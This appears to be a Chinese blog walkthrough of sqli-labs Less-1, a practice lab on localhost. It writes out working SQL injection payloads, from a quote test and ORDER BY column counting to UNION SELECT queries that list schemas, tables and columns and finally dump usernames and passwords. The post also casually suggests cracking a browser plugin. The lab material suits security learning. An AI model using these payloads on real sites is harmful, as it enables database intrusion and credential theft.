準備最近刷一下sqli-labs,也是一個邊學習邊實踐的過程,希望自己可以堅持下去吧。
在這裏先推薦一下用HackBar這個瀏覽器插件(FireFox/Chrome),怎麼破解百度一下就成,我也不多說了,下面步入正題:
-
我們先輸入
http://localhost/sqli-labs-master/Less-1/?id=1
測試一下,沒有問題
-
http://localhost/sqli-labs-master/Less-1/?id=1’
在輸入id=1’測試就會發現報錯,說
你的SQL衣語法有錯,我們就可以知道是存在漏洞的。 -
下來查詢數據庫有多少列
http://localhost/sqli-labs-master/Less-1/?id=1' order by 3
,正常。
-
當
http://localhost/sqli-labs-master/Less-1/?id=1' order by 4
報錯,我們便能知道總共3列.
-
下來查看哪些數據可以回顯,我們下來選擇在3的位置顯示信息。
-
查看所有的數據庫
http://localhost/sqli-labs-master/Less-1/?id=-1' union select 1,2,group_concat(schema_name) from information_schema.schemata --+
(當前數據庫爲security)
-
查看所有的表
http://localhost/sqli-labs-master/Less-1/?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' --+
我們建議‘security’用十六進制表示,不存在引號問題。
-
然後查看列的信息
http://localhost/sqli-labs-master/Less-1/?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --+
-
最後我們直接得到賬號和密碼信息
http://localhost/sqli-labs-master/Less-1/?id=-1' union select 1,group_concat(username) ,group_concat(password ) from users --+
至此,我們就算進行了一次成功的sql注入。